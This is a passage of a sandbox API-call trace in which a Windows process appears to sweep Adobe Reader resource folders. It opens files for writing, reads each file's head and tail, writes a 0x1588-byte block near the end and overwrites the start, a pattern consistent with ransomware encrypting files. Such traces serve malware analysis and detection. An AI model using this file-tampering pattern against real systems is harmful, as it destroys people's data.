10.0\\resource\\cmap\\adobe-japan1-ucs2")) returned 0x20 [0096.442] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscpc-euc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.442] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCpc-EUC", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCpc-EUC", lpFilePart=0x359f690*="Adobe-Korea1-KSCpc-EUC") returned 0x4d [0096.442] GetLastError () returned 0x5 [0096.442] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.442] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.442] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.442] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.443] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.443] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.443] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-KSCpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-kscpc-euc")) returned 0x20 [0096.443] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.443] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-H", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-H", lpFilePart=0x359f690*="ETen-B5-H") returned 0x40 [0096.444] GetLastError () returned 0x5 [0096.444] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.444] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.444] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.444] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.444] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.445] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.445] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETen-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\eten-b5-h")) returned 0x20 [0096.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.445] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-V", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-V", lpFilePart=0x359f690*="EUC-V") returned 0x3c [0096.445] GetLastError () returned 0x5 [0096.445] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.446] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.446] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.446] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.446] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.446] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.446] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-v")) returned 0x20 [0096.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.447] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-H", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-H", lpFilePart=0x359f690*="GBK2K-H") returned 0x3e [0096.447] GetLastError () returned 0x5 [0096.447] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.447] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.447] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.447] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.448] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.448] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.448] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-h")) returned 0x20 [0096.449] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.449] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-H", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-H", lpFilePart=0x359f690*="GBT-EUC-H") returned 0x40 [0096.449] GetLastError () returned 0x5 [0096.449] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.449] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.449] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.449] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.450] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.450] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.450] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-h")) returned 0x20 [0096.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.451] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-V", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-V", lpFilePart=0x359f690*="HKgccs-B5-V") returned 0x42 [0096.451] GetLastError () returned 0x5 [0096.451] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.451] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.451] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.451] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.451] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.452] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.452] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-v")) returned 0x20 [0096.452] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.452] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-V", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-V", lpFilePart=0x359f690*="Identity-V") returned 0x41 [0096.452] GetLastError () returned 0x5 [0096.807] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.807] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.807] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.807] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.808] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.808] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.808] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Identity-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\identity-v")) returned 0x20 [0096.809] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.809] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-H", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-H", lpFilePart=0x359f690*="KSCpc-EUC-H") returned 0x42 [0096.809] GetLastError () returned 0x5 [0096.809] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.810] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.810] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.810] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.810] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.810] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.810] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCpc-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscpc-euc-h")) returned 0x20 [0096.811] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbpc-euc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.811] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBpc-EUC", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBpc-EUC", lpFilePart=0x359f690*="UCS2-GBpc-EUC") returned 0x44 [0096.811] GetLastError () returned 0x5 [0096.811] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.811] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.811] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.811] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.812] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.812] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.812] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbpc-euc")) returned 0x20 [0096.813] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.813] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-V", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-V", lpFilePart=0x359f690*="UniGB-UCS2-V") returned 0x43 [0096.813] GetLastError () returned 0x5 [0096.813] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.813] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.813] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.813] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.814] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.814] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.814] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-v")) returned 0x20 [0096.814] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.814] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-V", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-V", lpFilePart=0x359f690*="UniJIS-UTF16-V") returned 0x45 [0096.814] GetLastError () returned 0x5 [0096.815] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.815] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.815] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.815] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.815] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.815] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.815] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-utf16-v")) returned 0x20 [0096.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bold.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0096.816] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.816] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x37e7c [0096.817] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.817] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.817] ReleaseMutex (hMutex=0x168) returned 1 [0096.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeArabic-Bold.otf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeArabic-Bold.otf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeArabic-Bold.otf", lpUsedDefaultChar=0x0) returned 20 [0096.817] ReadFile (in: hFile=0x1ec, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0096.847] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x36e7c [0096.847] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.860] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x36e7c [0096.860] WriteFile (in: hFile=0x1ec, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.861] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0096.861] WriteFile (in: hFile=0x1ec, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0096.862] CloseHandle (hObject=0x1ec) returned 1 [0096.862] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobePiStd.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobepistd.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0096.864] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.864] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x15e3c [0096.864] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.864] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.864] ReleaseMutex (hMutex=0x168) returned 1 [0096.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobePiStd.otf", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobePiStd.otf", cchWideChar=14, lpMultiByteStr=0x1f7362c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobePiStd.otf", lpUsedDefaultChar=0x0) returned 14 [0096.864] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0096.893] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x14e3c [0096.893] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.917] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x14e3c [0096.917] WriteFile (in: hFile=0x1ec, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.918] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0096.918] WriteFile (in: hFile=0x1ec, 